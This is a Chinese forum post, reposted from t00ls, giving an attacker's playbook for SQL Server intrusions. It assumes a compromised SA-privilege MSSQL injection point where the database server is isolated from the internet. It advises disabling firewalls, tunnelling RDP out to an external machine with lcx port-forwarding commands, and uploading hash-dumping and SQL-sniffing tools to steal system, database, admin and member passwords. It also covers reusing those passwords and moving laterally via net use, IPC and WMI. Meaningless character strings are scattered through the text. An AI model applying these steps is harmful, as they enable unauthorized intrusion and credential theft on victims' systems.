当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。 `/ j) |3 Y1 k, m& S* Y9 S M
+ W: {" E5 \, a- @
0 P; ~3 ~3 Z# Q b8 a6 U5 z2 B! q$ C0 k2 o% ?: U) q
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)- {+ k; T. m" R" H* N0 B0 B, F% U7 Z
3 S* ?4 ]$ S+ B+ ^% k
: Z) V+ S# j# |
一、DB机有公网IP.& e8 p/ j% z+ W4 k; n
# h4 Z9 m$ D0 f. q: V+ E8 U
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.+ U) R/ j; F/ w1 v( o& k
( K$ S S. v4 R- W# ^4 f# Z
2 ~1 S4 |* r9 e4 w# e' {
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389." V2 a) C* F f& q8 T
7 S( r" Z( H, Z, B' h
) y3 h8 s# F8 Z1 L: }0 |3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
' ^$ v9 f1 d$ L3 d! R- C8 ^
7 J. M! P" l" d: y: u
( ? K; S) T' L4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.; h: ^0 t1 }- t2 V& ]/ U
0 W# g$ V( X+ Q+ T; X
9 P1 {9 e/ ^2 i* j
3 N6 u/ L7 V0 R# v! [二、DB机只有内网IP
2 K, u, F, J) }$ H- o. A- P
5 ~5 a* E- C1 l7 U( z# Z; w1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
4 @. {) {" X( ^* V9 U0 t" h5 S2 g1 T$ C
) J& D% r$ V% p5 D# v/ ^
2:停掉防火墙和IP策略再从内往外扫描.
# b2 h2 N. z/ U! i; _9 D C0 l* Z: v% Q* V4 p4 B
# |! V7 Y! z1 G6 a# g3 n3 @
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.0 a* L B; Y1 q% l* g+ s
' ]! Y6 k0 ~) o
3 [ O `0 B: A6 d/ ]4:学会密码规律分析往往会有惊喜.# U# ]" w4 X# b/ i+ Y2 _( H) X0 X
9 A; }# F) u" q/ e s1 g
: D! }/ p. A, { r6 W5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等* Q" t8 I/ I+ K2 x; k
3 ]8 e/ o1 l; M( Y' H* R
1 R( }' c- I2 r+ c/ r8 W' p+ e
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对